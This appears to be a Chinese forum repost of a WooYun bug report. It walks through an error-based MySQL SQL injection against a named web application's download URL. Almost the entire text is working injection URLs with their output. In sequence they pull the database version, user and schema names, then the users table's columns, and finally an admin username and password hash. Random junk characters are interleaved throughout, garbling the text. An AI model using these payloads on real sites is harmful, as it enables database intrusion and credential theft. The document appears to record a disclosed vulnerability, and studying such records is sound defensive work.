http://www.wooyun.org/bugs/wooyun-2010-01666- T* ?5 _5 `/ U
$ G `& f( E7 h5 A
之前想找个测试 没想到这有 可以测试下做个记录而已 - [! J* A6 \3 r+ b. U* b5 Y
3 _9 b4 d+ f2 w. V7 b8 Z
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
" I4 l D0 {' h& Y* }3 U4 O* H9 {; G# R+ L3 p+ m% M
/data0/htdocs/leqi_new/app/myapp.php/ ]' U9 t! P$ K& R6 x" T
" x) f5 b U8 {! n: E$ H$ i 或者
/ R1 a( i% A# o e% m4 A% C) ]( N* F# T* o# I9 _
/**********version()**********/ 5.1.49-log% h- |' Q0 g: y3 | E
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' e9 ^! e) S9 X' t$ b4 J
8 H8 k. \7 k" r0 @5 [) ?/**********user()**********/
% L: K9 O$ z9 [; R; q% X2 ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
# i! J8 \* v& C. w, Q( A6 }2 j: e: }4 I3 J6 k; t3 a; O: u* f; n
/**********database()**********/ leqi
2 j. w& ^4 y% m+ M! bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- V" ]$ b% J0 q) i4 ?: S
8 Q5 h3 K0 L$ y3 r _
/**********limit依次递归爆库**********/3 h1 X7 z( b2 w4 }) H ]% X
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% P+ c/ p* @" }: R" U
information_schema
$ a5 z9 k6 m/ s t7 q1 F0 Bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 X2 w/ f2 j) U8 R5 ^. o; k3 @+ F& kleqi
+ n$ L5 Y) ?9 ^. @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
; d' i/ G& j" e( x1 I% @* e0 gtest' o+ b, `4 o. w+ R3 l* [
1 I% ^) |7 @( H/ k0 ?( v/**********limit依次递归爆表名**********/
$ [% Q& x$ h1 U7 O/ ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 Z4 w W+ N8 O5 E; Fusers
& Y7 B# C* D2 G8 D# r4 n" g# W3 d0 P. a) ]% ~! X
/**********limit依次递归爆字段名**********/
6 `) B8 p; |; v8 Z' e+ nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: v; R$ x: x" q/ a3 iuser_id,username,nickname,passwd,group_id
" w4 r* b% k: v5 q% whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
8 e8 A7 \- a+ @/wapc/5000_0005_003
) ~; n$ a! L4 R& Q/ m" y$ e11 21
. D1 L$ _5 S# E0 T H3 G3 }http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
& |# g9 }5 B1 O/wapc/5000_0005_003( i# q, ]- s6 ~% f* d
11 341 351 361& d# M \. V/ s' u1 ~; [; v6 \
/**********爆数据**********/
6 l: `1 R; H' s7 J2 T8 Vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%238 ~! R: F; k8 t$ O$ {) Y$ s
admin
: x" I0 s* N: M7 w: B/ ]8 E/ q r; Bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' }+ d* `$ H, c) v6a8b4574ca231eb8bd52764d4978ffcd
4 A5 Y Y+ u+ \4 T1 `; F" t' {7 F; c" u2 ~3 {4 g4 t5 p. ]- U
. U" w( G# N" p' U! M5 F |